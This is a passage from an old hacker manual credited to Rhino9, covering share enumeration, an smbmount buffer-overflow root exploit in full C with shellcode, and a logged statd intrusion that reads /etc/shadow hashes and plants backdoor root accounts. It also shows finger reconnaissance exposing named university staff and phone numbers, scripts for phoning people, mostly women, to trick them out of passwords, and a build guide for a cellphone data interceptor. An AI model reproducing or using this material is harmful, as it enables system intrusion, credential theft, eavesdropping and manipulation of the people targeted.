10798access any files that are shared to that restricted host. Ex: in our above example if we spoofed as
10799elite.ninja.com we would then have access to /usr. Although this technique is old it still works on
10800many servers. So learn it and use it.
10801
10802To check if a server has filesharing do: rpcinfo -p server.com
10803terra:/home/m/mgi/.noid $rpcinfo -p oberon.calstatela.edu
10804 program vers proto port service
10805 100000 4 tcp 111 rpcbind
10806 100000 3 tcp 111 rpcbind
10807 100000 2 udp 111 rpcbind
10808 100004 2 udp 713 ypserv
10809 100004 2 tcp 714 ypserv
10810 100003 2 udp 2049 nfs
10811If it has a like the above one that says nfs, then it has filesharing.
10812
10813[16.0.3] COMPARISION TO THE MICROSOFT WINDOWS FILESHARING
10814
10815NBTSTAT –a www.ninja.com would show the NetBIOS Statistics which includes shared folders
10816(directories)
10817C:\nbtstat –A 204.73.131.11
10818
10819 NetBIOS Remote Machine Name Table
10820
10821 Name Type Status
10822---------------------------------------------
10823STUDENT1 <20> UNIQUE Registered
10824STUDENT1 <00> UNIQUE Registered
10825DOMAIN1 <00> GROUP Registered
10826DOMAIN1 <1C> GROUP Registered
10827DOMAIN1 <1B> UNIQUE Registered
10828STUDENT1 <03> UNIQUE Registered
10829DOMAIN1 <1E> GROUP Registered
10830DOMAIN1 <1D> UNIQUE Registered
10831..__MSBROWSE__.<01> GROUP Registered
10832
10833MAC Address = 00-C0-4F-C4-8C-9D
10834
10835C:\net view 204.73.131.11
10836Shared resources at 204.73.131.11
10837
10838
10839
10840Share name Type Used as Comment
10841
10842------------------------------------------------------------------------------
10843NETLOGON Disk Logon server share
10844Test Disk
10845The command completed successfully.
10846
10847C:\net use x: \\204.73.131.11\test
10848The command completed successfully.
10849
10850
10851 [16.0.4] SMBXPL.C
10852
10853/*
10854The default parameters to the program
10855often work, however I have found that the offset parameter sometimes
10856varies wildly, values between -600 and -100 usually work though, a quick
10857shell script will scan through these.
10858*/
10859
10860/*
10861** smbexpl -- a smbmount root exploit under Linux
10862**
10863** Author: Gerald Britton <gbritton@nih.gov>
10864**
10865** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
10866** The code does not do range checking when copying a username from
10867** the environment variables USER or LOGNAME. To get this far into
10868** the code we need to execute with dummy arguments of a server and a
10869** mountpoint to use (./a in this case). The user will need to create
10870** the ./a directory and then execute smbexpl to gain root. This code
10871** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
10872** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally
10873** a "-Q" (an invalid commandline argument) causes smbmount to fail when
10874** parsing args and terminate, thus jumping into our shellcode.
10875**
10876** The shellcode used in this program also needed to be specialized as
10877** smbmount toupper()'s the contents of the USER variable. Self modifying
10878** code was needed to ensure that the shellcode will survive toupper().
10879**
10880** The quick fix for the security problem:
10881** chmod -s /sbin/smbmount
10882**
10883** A better fix would be to patch smbmount to do bounds checking when
10884** copying the contents of the USER and LOGNAME variables.
10885**
10886*/
10887
10888#include <stdlib.h>
10889#include <stdio.h>
10890
10891#define DEFAULT_OFFSET -202
10892#define DEFAULT_BUFFER_SIZE 211
10893#define DEFAULT_ALIGNMENT 2
10894#define NOP 0x90
10895
10896/* This shell code is designed to survive being filtered by toupper() */
10897
10898char shellcode[] =
10899 "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
10900 "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
10901 "\xeb\x05\xe8\xdb\xff\xff\xff"
10902 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
10903 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
10904 "\x80\xe8\xdc\xff\xff\xff/tmp/sh";
10905
10906unsigned long get_sp(void) {
10907 __asm__("movl %esp,%eax");
10908}
10909
10910void main(int argc, char *argv[]) {
10911 char *buff, *ptr;
10912 long *addr_ptr, addr;
10913 int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
10914 int alignment=DEFAULT_ALIGNMENT;
10915 int i;
10916
10917 if (argc > 1) bsize = atoi(argv[1]);
10918 if (argc > 2) offset = atoi(argv[2]);
10919 if (argc > 3) alignment = atoi(argv[3]);
10920 printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);
10921
10922 if (!(buff = malloc(bsize))) {
10923 printf("Can't allocate memory.\n");
10924 exit(0);
10925 }
10926
10927 addr = get_sp() - offset;
10928 fprintf(stderr,"Using address: 0x%x\n", addr);
10929
10930 ptr = buff;
10931 addr_ptr = (long *) (ptr+alignment);
10932 for (i = 0; i < bsize-alignment; i+=4)
10933 *(addr_ptr++) = addr;
10934
10935 for (i = 0; i < bsize/2; i++)
10936 buff[i] = NOP;
10937
10938 ptr = buff + (128 - strlen(shellcode));
10939 for (i = 0; i < strlen(shellcode); i++)
10940 *(ptr++) = shellcode[i];
10941
10942 buff[bsize - 1] = '\0';
10943
10944 setenv("USER",buff,1);
10945 execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);
10946}
10947
10948[16.0.5] Basic Unix Commands
10949
10950pwd - Shows the current directory that you are in.
10951cd – change directory. Ex: cd hack would put you into the directory hack
10952cd .. would drop you back 1 directory. So if you are in /home/chameleon and you type cd .. you
10953would then be in /home
10954ls – List files. ls –a to show ALL files. ls –l to list files in long format with byte size etc.. ls –la to do
10955both.
10956chmod – This command changes permissions of a file or directory. The syntax is as follows:
10957chmod who+,-,=r,w,x
10958who can be u (user) g (group) o (other) a (all)
10959The + means to add the permission and - means to remove the permission.
10960cat – This prints out stuff to the screen. Such as files. Ex: cat /etc/passwd this would print the
10961password file to the screen. You could also do cat /etc/passwd > password.txt this would redirect
10962the out put of passwd into the file password.txt, that is what the > is used for.
10963passwd – Changes password to a users account.
10964ps – Shows what processes you have running. ps –e will show everything that you have running.
10965grep – Searches for words that you specify. This can be used to search a file for a certain word
10966Ex:
10967$ grep rhino9 elite.txt
10968Rhino9 is elite…
10969$
10970we could also use this to find a username with out a password in the passwd file. We would do
10971cat /etc/passwd | grep ::
10972mv – Moves (rename) files and directorys. Syntax: mv filename newfilename You can also pass
10973folder arguments such as mv /etc/passwd /etc/passwd.txt Example mv command.
10974$ ls
10975rhino9
10976$ mv rhino9 rhino9.txt
10977$ ls
10978rhino9.txt
10979$
10980cp – Copy. Syntax: cp filename copiedfilename You can also pass folder arguments
10981ex: cp /e/beer cp /e/beer.txt
10982man – Manual pages. Syntax man commandyouneedhelpon. Ex: man grep would give you help
10983on the grep command
10984--help – Get help on certain commands. Ex: finger –help
10985mkdir – Creates a directory. Syntax: mkdir newdirname
10986rmdir – Removes a directory. Syntax: rmdir dirname
10987rm – Removes files and folder. Syntax: rm filename rm –R foldername (most systems)
10988write – Write to another users terminal. Syntax write user ttyname then hit enter then type stuff
10989then ctrl+d
10990mesg – Turns on or off write access to your terminal. Syntax: mesg y (on) mesg n (off)
10991su – While you are already logged into a system. You can log in with another account. su
10992username
10993w – Shows who is online.
10994who – shows who is online.
10995
10996[16.0.6] Special Chracters in Unix:
10997
10998* - matches any number of single characters eg. $ ls john* will list all files that begin with john
10999 [...] - matchs any one of the chracter in the [ ]
11000? - matches any single chracter
11001& - runs a process in the backgroung leaving your terminal free
11002$ - values used for variables also $n - null argument
11003>- redirectes output ls -la > /tmp/list
11004< - redirects input to come from a file
11005>> - redirects command to be added (appended) to the end of a file
11006| - pipe output (eg: cat /etc/passwd | mail tk85@hotmail.com will mail tk85@hotmail.com the
11007/etc/passwd file)
11008
11009[16.0.7] File Permissions Etc..
11010
11011-rwxrwxrwx 1 user group 5 Dec 22 12:52 filename
11012The first section is the file permissions, read & write etc..
11013If the first character is:
11014- - is an ordinary file
11015d - is a directory
11016b - is a block file
11017c - is a character file
11018The next 3 characters after the first char, are the owners rights to the file. They can be r or w or x
11019or all 3 or whatever. The second 3 characters are the group rights to the file and they can be r or
11020w or x or all 3 or whatever. The last 3 characters are everyone elses rights to the file and they can
11021be r or w or x.
11022r – read
11023w - write
11024x – execute
11025The next section after –rwxrwxrwx is how many files are within that folder. If it is not a folder then
11026it will be 1 and if it is a folder then it will be how many files are in it. The next section after that is
11027the username section. It is the username of the owner of the file. So therefore whoever’s name is
11028there has the owner rights as described earlier. Then after that is the groupname. It is the name
11029of the group that the file is in. Whatever the groupname is the group rights apply to it. Then
11030comes the file size then the file date and lastly the file name.
11031
11032Passwd Entry Break Down
11033chameleon:k54doPeHte:0:0:root of all evil:/home/chameleon:/bin/bash
11034^^^^^^^^^ ^^^^^^^^^^ ^ ^ ^^^^^^^^^^^ ^^^^^^^^^^^^^^^ ^^^^^^^^
11035 A B CD E F G
11036--------------------------------------------------------------------------------------------------------------------
11037Username | Encrypted pass | user id | group id | comments | home directory | shell the user uses
11038 A B C D E F G
11039
11040[16.0.8] STATD EXPLOIT TECHNIQUE
11041
11042Statd Is one of the best c file exploits in a long time. Statd single handedly exploits SunOS X.X &
11043Sys V systems. It works by exploiting a buffer overflow through rpc and drops you into root on a
11044remote system. There are statd scanners and other neat tools that can be found at,
11045www.d-lab.com.ar/sekret/warez (home of the famous Code Zero). Once you have the statd exploit
11046program (runs on some sunos & sys v servers) you will want to either use a scanner to scan a
11047large list of servers for statd exploitable ones. One good way of finding statd exploitable server is
11048going to yahoo and then searching for “sys v†then try the different servers that yahoo finds. You
11049can use a program called “hosts†by Devix that will dump server names from html files. So if you
11050goto yahoo and then search for sys v you could dump all the serves into a text file with the hosts
11051program and then use a statd scanner to have it check for statd exploitable servers. Devix’s hosts
11052program can be found on the rhino9 site. Ok so say you have found a statd able server. You type
11053at your prompt statd server.com Here is a log of an actual hack using statd. Note: Comments
11054have *’s around them.
11055
11056InterCore:/home/chameleon/ $statd www.victim.com
11057*This server is statd exploitable but the server admin has been notified so don’t try it.*
11058rpc.statd is located on tcp port 44417
11059sent exploit code, now waiting for shell...
11060*first thing to do is type, w, to see who is on and if any sysadmins are active*
11061# w
11062 5:27am up 3 day(s), 6:35, 4 users, load average: 0.05, 0.06, 0.07
11063User tty login@ idle JCPU PCPU what
11064gabe pts/3 Sat 1am 2:38 1:37 -tcsh
11065gburgyan pts/4 Fri11pm 55 20 2 pine
11066gabe pts/5 Sat 7am 3:08 29 -tcsh
11067gburgyan pts/8 Mon 4am 23:22 16 -tcsh
11068*Note: statd is not telnet so you wont show up when someone does w etc.. so you are a ghost*
11069# cat /etc/passwd
11070root:x:0:1:System Administrators:/:/sbin/sh
11071daemon:x:1:1:0000-Admin(0000):/:
11072bin:x:2:2:0000-Admin(0000):/usr/bin:
11073sys:x:3:3:0000-Admin(0000):/:
11074adm:x:4:4:0000-Admin(0000):/var/adm:
11075kane:x:539:107:Kane Products FTP account:/usr/www/docs/kane/:/bin/true
11076ecco:x:540:107:ECCO:/usr/www/clients/ecco/:/bin/true
11077iodatsys:x:541:107:I/O Data Systems:/usr/www/clients/iodatasys/:/bin/true
11078nealschu:x:542:107:Neal Schuman FTP Account:/usr/www/clients/nealschuman/:/bin/true
11079jjames:x:543:107:Joanne James:/home/jjames:/bin/tcsh
11080nlock:x:543:107:nlock:/home/milo:/bin/tcsh
11081xlock:x:0:1:xlock:/:/sbin/sh
11082# echo b0bby:x:542:107:Rhino9 owns bitch:/usr/rhino9/:/bin/tcsh >> /etc/passwd
11083# echo b0b:x:0:1:Rhino Root:/:/sbin/sh >> /etc/passwd
11084*What this does is copys a low level user b0bby and a root user b0b. Remember that 2 >>’s make
11085the stuff appened to the passwd file. If it was one > then the whole thing would be over written
11086and that is not good!*
11087# cat /etc/shadow
11088root:jLKY54WA3Teeo:10200::::::
11089daemon:NP:6445::::::
11090bin:NP:6445::::::
11091sys:NP:6445::::::
11092adm:NP:6445::::::
11093kane:*LK*:::::::
11094ecco:J/f78z945yJiQ:10199::::::
11095iodatsys:k/F455ygv0lKo:10199::::::
11096nealschu:Z1te54ytjJxtyY:10199::::::
11097jjames:q1dMg453A0LYLE:10199::::::
11098nlock:hEcxTL/4353p3FU:10216::::::
11099xlock::10200::::::
11100# echo b0bby::10199:::::: >> /etc/shadow
11101# echo b0b::10200:::::: >> /etc/shadow
11102*You must do the passwd and shadow echos as we have show here if the system uses
11103shadowed passwords. What we have just done is add the logins to the shadow password*
11104#
11105*Now press control + ][ Then hit enter*
11106DropStatd> quit
11107*Type quit at the prompt. You are now back on your system. Now telnet back to www.victim.com*
11108InterCore:/home/chameleon/ $ telnet www.victim.com
11109Trying 205.133.121.210...
11110Connected to deals.4deals.com.
11111Escape character is '^]'.
11112
11113
11114UNIX(r) System V Release 4.0 (hq)
11115
11116login: b0bby
11117*Then it will ask you to set a password*
11118VictimCorp$ su b0b
11119#
11120*What we did the was su into b0b, our root account. Now set a pass for b0b*
11121# passwd b0b
11122*Enter your pass*
11123
11124There you go that basically all it takes to get root onto a system that is statd exploitable.
11125Thank you to so1o for that mad phat exploit.
11126
11127[16.0.9] System Probing
11128
11129The following are ways in which to gather information from a target host.
11130For the rest of this topic we will refrer to the target site which will be ninja.com.
11131These are in no order and are mostly unix commands used to gather information about a system.
11132
11133[16.1.0] Port scanning:
11134
11135You can find many port scanners on the internet. Search yahoo for portscan etc…
11136What is a port scanner?
11137What a port scanner does is it checks a remote host for open ports, ports listening for a
11138connection request or remote services etc… The importance of port scanning a system is to find
11139out the services it has open. If we know what services a server has open we can then research
11140and try to find flaws for those services. Also we can do certain DoS attacks if we know what ports
11141are open. There are many port scanners. Some of the more advanced ones are for unix and can
11142not leave a trace on the remote server that you port scanned.
11143
11144[16.1.1] rusers and finger command:
11145The commands syntax are as follows:
11146rusers [-a] [-h] [-i] [-l] [-u] [host ...]
11147finger
11148-v, --version display version number
11149-i, -l, -m, --info display full user information
11150-b, -s, --brief opposite of --info; only display login records
11151-f, --faces display mugshot for user
11152-P, --port #p connect to finger daemon using port or service #p
11153-h, --help display this message
11154
11155Now you will find however that most servers have turned off finger services. Almost no
11156WindowsNT servers have finger services and most unix have shut off finger services. The rusers
11157command is to check for people logged in with rsh or rlogin (remote login).
11158Side Note: There used to be an old bug in rlogin where you could type: rlogin –lroot victim.com
11159and when the remote server parsed the data it would not read right and you would get root
11160access however this technique is old and rarely works anymore. By using finger and rusers we
11161can get users names and that right there can lead to access of a system. Take nether.net for
11162example. If you finger nether.net
11163 (finger @nether.net) you will get a list of user names. Now its been my experience that systems
11164such as nether.net or places that give access to everyday users, 1 out of 70 or so users picks the
11165same user name as there password. So it wouldn’t take much time to finger @nether.net then
11166telnet to nether.net and try all the users you got from the finger. Also since you have gotten a list
11167of usernames from finger nether.net you could then send e-mails to the users saying that you are
11168a system official at nether.net and need to verify there password etc… You would be surprised
11169what a little mind games can do for you. Also a good
11170finger –l @victim.com can give you information such as the last time a user logged in, what type
11171of shell there account is set to use, and where there home directory is. We can also watch for
11172patterns in a users access to a system. We could see whether they come on at night or during the
11173day. To drop back to the thing of knowing about a person and there information to try and guess
11174or talk them out of there password. Here is a finger on purdue. Look at the interesting information
11175we can get.
11176
11177InterCore:/home/chameleon/ $finger @purdue.edu
11178[purdue.edu]
11179To use finger to search the Purdue Electronic Directory Service, specify your
11180query as a person's given name. You can specify just a last name, a first
11181name and a last name, or a first name, last name, and middle initial, by
11182separating them with periods or commas. For example,
11183
11184 finger smyth@purdue.edu
11185 finger smyth,veronica@purdue.edu
11186 finger veronica.j.smyth@purdue.edu
11187Note: there was a lot more then this but I snipped it to make this shorter. Basically what it is
11188saying is you got to put a user@server.com instead of just server.com or in this case,
11189purdue.edu.
11190InterCore:/home/chameleon/ $
11191
11192So by looking at what it said I see it says finger smyth@purdue.edu as an example. Now this is
11193probably the same example that comes with this particular finger daemon but what the hell, lets
11194try it.
11195
11196InterCore:/home/chameleon/ $finger smyth@purdue.edu
11197[purdue.edu]
11198Output of your query: smyth
11199Name Dept/School Phone Status
11200 Email
11201-------------------------------------------------------------------------------
11202veronica j smyth computing center +1 777 99-99999 staff
11203 <no email address available>
11204michael steel smyth engineering and tec student
11205 <no email address available>
11206barbara j wilson smyth liberal arts and sc student
11207 <no email address available>
11208william paul smyth freshman engineerin student
11209 <no email address available>
11210erin margaret smyth science student
11211 <no email address available>
11212cheryl lynn smyth liberal arts student
11213 <no email address available>
11214-------------------------------------------------------------------------------
11215For a more detailed response, finger "query_smyth@directory.purdue.edu".
11216For help, finger "help@directory.purdue.edu".
11217InterCore:/home/chameleon/ $
11218
11219Now this helps us in some ways and doesn’t. We can see through this finger full names of
11220students and what there major is. So what you ask? You know how much information you can get
11221from someone’s legal full name? Chameleon will teach you how much later on in this document.
11222So yes this finger was good because it got us personal information about a few account holders
11223at purdue.edu even an administrators number but, what are the user names to these accounts?
11224Well most universities issues there students accounts in the same way. They usually make the
11225username for a students account first letter of first name and then full last name. So if your name
11226is Kevin Hall your user name would be khall@purdue.edu. Now we could then try and finger that
11227user. So we would do the following:
11228
11229InterCore:/home/chameleon/ $finger khall@purdue.edu
11230[purdue.edu]
11231
11232Output of your query: khall
11233
11234Name Dept/School Phone Status
11235 Email
11236-----------------------------------------------------------------------------------
11237Kevin G. Hall computing center +1 213 463-6694 student
11238 khall@purdue.edu
11239-----------------------------------------------------------------------------------
11240
11241For a more detailed response, finger "query_khall@directory.purdue.edu".
11242For help, finger "help@directory.purdue.edu".
11243InterCore:/home/chameleon/ $
11244
11245We see that the finger dameon says for a more detailed response to do
11246finger query_khall@direcroty.purdue.edu So we type in the command
11247
11248InterCore:/home/chameleon/ $finger query_khall@directory.purdue.edu
11249[scribe.cc.purdue.edu]
11250
11251Output of your query: query_khall
11252
11253----------------------------------------
11254 name: Kevin G. Hall
11255 campus: west lafayette
11256 title: sen syst anlyst/sen pace tech cons
11257 department: computing center
11258 building: potr
11259 office_phone: +1 765 49-68285
11260 email: khall@purdue.edu
11261----------------------------------------
11262
11263For help, finger "help@directory.purdue.edu".
11264InterCore:/home/chameleon/ $
11265
11266Now this is interesting. We have a user name, khall, we have the users full name, Kevin G. Hall
11267and we know his title and department. So from this information you will learn later you can get his
11268home phone number and address. If we were to give the student a call at their house or dorm
11269etc… It wouldn’t be too hard for anyone with a little bit of social engineering skills to talk this user
11270out of his password.
11271There is a basic example of how to get information about a logged on user.
11272
11273[16.1.2] Mental Hacking, once you know a username.
11274
11275Note: This is mostly going to work for systems that provide users with accounts and not company
11276servers.
11277If you (the (cracker/hacker) are a Male then you would want to try to finger and get a username of
11278a woman. You could then do 2 things. You will probably get there full name but if not read my
11279(chameleons) later paper about getting people’s information. For simplicities sake say you
11280already have the users phone number which might sound hard to do but isn’t. So say you have
11281their phone number and it’s a woman. Call the lady up. A true social engineer will know right
11282away what kind of woman it is. On you can push over and mow down or one that has a strong
11283head on her shoulders. If she answers and sounds lame then go for the approach of a stern voice
11284saying its imperative etc… that you verify her user name and password. If the lady seems to have
11285a strong head on her shoulders then you would want to talk nicer and flirt a bit. If you are a
11286woman (cracker/hacker) then you will want to find a males account. Women let me tell you this.
11287The best hackers and crackers out there are women. If you are a woman then you will want to try
11288to get into a male’s account. Once you have a male account holders phone number call him up.
11289Women you got it easier see you don’t need to know what type of guy it is. All guys are horny. So
11290talk with your sexy voice. Flirt with them etc… It is easier for women to talk people out of
11291passwords. If you are a guy (cracker/hacker) and are trying to get a guys password then have a
11292girlfriend of yours try to do it. Remember this most of all, KNOW the person you are calling. You
11293could call them up and tell them you are from the local high school and are doing a survey and
11294then ask them a bunch of questions to get to know what they like and then when you later call to
11295get there password you use this information to get on there better side and win there trust. This is
11296called mental hacking and it is not that hard at all. One thing that the hackers of today have lost is
11297there social skills. Some systems don’t have software exploits. Sometimes you have to go the
11298extra mile. Note: Don’t get me wrong and think I am some weirdo about the way I talked about
11299men and women but, I do know people well.
11300
11301[17.0.0] Making a DDI from a Motorola Brick phone
11302By Virtual of Cybrids CSE
11303www.cybrids.org
11304
11305
11306OK, here it is, i'm not gonna talk about it a whole lot, just tell you
11307what i've done, and what i want to see done. As of this point I have
11308found the Clock, Data, and the spot where you would feed your audio input
11309from your scanner that has WBFM.
11310
11311First you will need to locate the chip that has the clock and data pins.
11312This will be labeled SC3800xxFN, or something close to that, xx being some
11313numbers. Having trouble already, then i'll tell ya another way, its the
11314biggest PLCC (square) chip in the phone. Now look at the chip, there is a
11315notch on the front of it which means pin 1. Now look at the opposite side
11316of that dot, to the pins on the bottom, count over from the left, pins 8
11317and 9 from the left side are the ones you want. I have included a picture
11318of the inside of a brick phone. The red arrow points to the side of the
11319chip that I am talking about. Pin 8 is the data and Pin 9 is the clock.
11320Those are the pins that will be fed to your computer for decoding.
11321
11322The receiver chip is what you need to modify next. It's on the circuit board
11323with the big white rectangle thing, and the big peices of metal, its the
11324only square chip you can see. Its got a few numbers on it and i'll put em
11325here to help you find it, 185, X94R01, something to that effect, but just
11326look for the only PLCC chip visible. I have marked this chip with a blue
11327circle. With the phone oriented like in the picture, cut the trace coming
11328from the bottom pin on the right of the chip. Connect your scanner's OUTPUT
11329to the other side of that trace (not the one conecting to the chip).
11330Cut it in the center so you will have room to solder to either side
11331of the wire trace. The pin coming off the chip is what the cellular phone
11332is receiving, the other side of the wire trace that you cut is where its
11333being sent.
11334
11335That about sums up what you need to know, if you have any other non-bonehead
11336questions, i'm in #cellular on EFnet most all the time and #Cybrids on
11337Undernet.
11338
11339Now here is what I want to see happen, for all the smart guys out there.
11340Scanners are cool, but why use it, the phone is capable of receiving the
11341RECC without a scanner, I am working on makin this happen right now, but
11342with others help, i'm sure this could get done a lot faster, and would
11343benefit everyone greatly.
11344
11345
11346Cable connections to the computer
11347
11348DDI Parallel Port
11349
11350Clock 10
11351Data 15
11352Ground 18
11353
11354Special Note: The graphic that is referenced in this portion can be obtained at the rhino9 website
11355or directly from Virtual. Find him in #cybrids on Undernet.
11356
11357(Beware of new technology coming out from companies such as Cellular One, technologies such
11358as FPF Protection which requires you to enter an access code to make out going calls on your
11359cellphones.)
11360
11361[18.0.0] Pager Programmer
11362
11363By Virtual of Cybrids CSE
11364
11365 In order to build a pager programmer, you are going to need a few things. A soldering
11366Iron, the pager you are going to program, and a few brain cells. You will also need the software
11367that is used to program your specific pager which can be found on my web page at the bottom of
11368the text. The diagram I have included should be self explanatory but I will say a few things about
11369it just incase. The only chip needed is the Max233 which will convert the serial port voltage down
11370to TTL level so the pager can understand it. Normally a serial port communicates with +15 volts
11371being a logic high and -15 being a logic low. The chip converts this down to TTL which is 0 - 5
11372volts where 0 is low and 5 is high. The chip is shown inside the plastic hood that covers the
11373connector. Make sure your hood is plastic and not metalized as this is real metal coating and will
11374short the pins. This side will plug into your serial port. The 4 pin connector shown will go to the
11375pager. Where it says +5 volts is where you supply the chip with 5 volts, its not a 5 volt output. A
11376circuit like this could be used to generate the +5 volts using the very common 7805 voltage
11377regulator. _________
11378 | |
11379 | 7805 |
11380 |_______|
11381 | | |
11382 Vin ________| | |_________Vout
11383 |
11384 -----
11385 --- gnd
11386 -
11387Vin = Voltage in, 6-12 volt wall adaptor, + goes to Vin, - goes to gnd
11388Vout = +5 volts out
11389gnd = ground, could be thought of as minus
11390
11391
11392 You will also have to supply your pager with power, which is probably 1.5 volts. Then
11393you will have to find the transmit and receive pins on your pager and hook it up to the
11394programmer accordingly. The only way to do this is to open up your pager and look around for
11395something that might look like a programming connector or pad with 3 or 4 wires, don't confuse
11396this with the connector that connects the processor and receiver boards in Motorola Bravo
11397pagers. I can't give exact instructions here because unfortunately I do not own every pager in the
11398world. If they aren't hooked up correctly when you run the pager programming software it will just
11399give you an error but won't affect the pager, so just switch the wires around. Make sure you
11400hooked the ground to the pager too, or else nothing will work. The gnd wire should be connected
11401to the minus terminal on the pagers battery connector.
11402 The chip, hood, and connector can be bought at DigiKey. This is by far the simplest and
11403easiest to build design I've seen on the net. Motorola's web page shows all of their pager designs
11404so you can figure out what type of pager you have, and can then get the software for it.
11405
11406Programming Software: http://www.cybrids.org/virtual/
11407Motorola: http://www.mot.com/MIMS/MSPG/cgi-bin/prodcat.cgi
11408
11409Special Note: The graphic that is referenced in this portion can be obtained at the rhino9 website
11410or directly from Virtual. Find him in #cybrids on Undernet.
11411
11412[19.0.0] The End
11413
11414Rhino9 and the other people that attributed to this document have enjoyed passing on their
11415knowledge and will continue to do so. Be on the look out next year for The MHD version 2.0.
11416
11417Stop persecuting and criminalizing the curious.
11418
11419Peace.